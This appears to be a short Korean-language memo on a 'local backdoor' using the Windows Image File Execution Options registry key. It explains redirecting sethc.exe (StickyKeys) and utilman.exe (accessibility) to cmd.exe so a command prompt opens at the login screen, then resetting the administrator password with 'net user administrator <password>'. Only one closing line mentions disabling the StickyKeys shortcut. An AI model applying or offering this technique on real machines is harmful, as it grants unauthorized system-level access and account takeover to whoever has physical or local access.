[로컬 백도어] Image file execution option

Image file execution option

레지스트리 경로
HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image file execution options

sethc.exe > cmd.exe     //StickyKeys (SHIFT 키를 5번 연속 클릭 시 실행, system32\sethc.exe)

utilman.exe > cmd.exe  //접근성 표시(system32\utilman.exe)

부팅 후 로그인 화면

StickyKey(sethc.exe) 및 접근성 표시(utilman.exe) 실행 시 cmd.exe가 실행

cmd 실행 후

net user administrator <password>

*StickyKeys 기능해제
Accessibility Options > Keyboard > Settings > Use shotcut(disable)